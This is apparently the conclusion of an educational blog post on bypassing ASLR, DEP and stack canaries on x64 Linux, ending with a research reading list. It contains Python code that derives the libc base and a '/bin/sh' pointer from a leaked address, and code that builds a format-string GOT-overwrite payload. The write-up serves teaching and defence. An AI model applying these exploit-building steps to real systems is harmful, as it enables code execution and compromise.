Address space layout randomization and position independent executables fully randomize the address space of any executed binary and were implemented not just as another "final defense against attack X" mechanism, but to make exploitation in general a lot harder.
The introduced randomness breaks all of the static exploit approaches that worked before.
But the design flaws that were found, especially on 32 bit operating systems, reduce the viability of this technique by quite a lot.
Luckily the era of 32 bit OSes is coming to an end, at least in the desktop and server area; IoT is another topic :) …
The PoC shown introduced x64 exploitation and demonstrated what a bypass of an ASLR, DEP and stack canary hardened binary can look like.
The used vulnerabilities were more than obvious, and real-life exploitation is (most often) a lot more difficult, but I think the general idea was conveyed in an easy-to-digest manner.
At best you have an awesome memory leak, which gets you some libc address and maybe even the canary.
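One leaked libc address is all it takes to recover the whole randomized mapping: subtract the symbol's static offset inside the libc file to get the base, then add other offsets. The offsets below match one common libc build and are otherwise to be treated as hypothetical; they differ between libc versions (readelf -s and strings -t x will tell you yours).

```python
# the leaked runtime address minus the symbol's static offset inside the
# libc binary yields the randomized base; every other symbol is base + offset
LEAKED_SYSTEM = 0x7f6c34c9a390  # leaked at runtime, changes on every execution

OFF_SYSTEM = 0x45390   # offset of system() inside the libc file (build-specific)
OFF_BINSH  = 0x18cd57  # offset of the "/bin/sh" string (build-specific)

libc_base = LEAKED_SYSTEM - OFF_SYSTEM  # randomized base of this run
binsh     = libc_base + OFF_BINSH       # "/bin/sh" pointer for the chain
```

With these two values the ROP chain from the PoC can be rebuilt on every run, no matter where ASLR put libc.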
If RELRO is not fully enabled and we have a viable format string vulnerability at hand, we can try to overwrite the entries within the GOT.
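A rough sketch of what such a GOT overwrite payload could look like, built in pure Python: the target address is written in three 16-bit chunks via %hn writes, ordered by ascending value so each padding step only adds characters. The GOT slot, the argument position and the reserved specifier length are hypothetical and have to be determined for the concrete binary.

```python
import struct

p64 = lambda a: struct.pack("<Q", a)

GOT_ENTRY = 0x601018        # hypothetical GOT slot in a partial-RELRO binary
SYSTEM    = 0x7f6c34c9a390  # resolved libc address we want to write there
ARG_POS   = 6               # hypothetical: our buffer is the 6th stack argument
SPECS_LEN = 64              # fixed space reserved for the format specifiers

# split the 48-bit address into three 16-bit chunks, sorted by value so the
# running character count only ever has to grow
chunks = sorted(((SYSTEM >> (16 * i)) & 0xffff, i) for i in range(3))

addr_pos = ARG_POS + SPECS_LEN // 8  # stack position of the first address below
fmt, written = b"", 0
for k, (value, i) in enumerate(chunks):
    pad = (value - written) % 0x10000
    if pad:
        fmt += b"%" + str(pad).encode() + b"c"          # print pad more chars
    fmt += b"%" + str(addr_pos + k).encode() + b"$hn"   # 2-byte write
    written += pad

payload = fmt.ljust(SPECS_LEN, b"A")      # keep the address positions fixed
for value, i in chunks:
    payload += p64(GOT_ENTRY + 2 * i)     # targets of the %hn writes
```

The addresses go at the end of the payload so their null bytes do not terminate the format string early.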
PIE makes building ROP chains quite a bit more complex and was left out for the sake of understandability.
Last but not least I hope you enjoyed the read, and as always I would appreciate your feedback to make future articles better!
- Differences Between ASLR on Windows and Linux
- Position Independent Executables (PIE)
- Breaking Kernel Address Space Layout Randomization with Intel TSX
- ASLR support for Linux
- kernel ASLR (kASLR) support for Linux
- Exploiting Linux and PaX ASLR’s weaknesses on 32- and 64-bit systems
- Address Space Layout Randomization by PAX
- Offset2lib: bypassing full ASLR on 64bit Linux
- Surgically returning to randomized lib(c)
- Linux Kernel on Git
- Derandomizing Kernel Address Space Layout for Memory Introspection and Forensics
- Practical Timing Side Channel Attacks against Kernel Space ASLR
- Just-In-Time Code Reuse: On the Effectiveness of Fine-Grained Address Space Layout Randomization
- On the Effectiveness of Address-Space Randomization
- New ASLR bypass presented in March 2018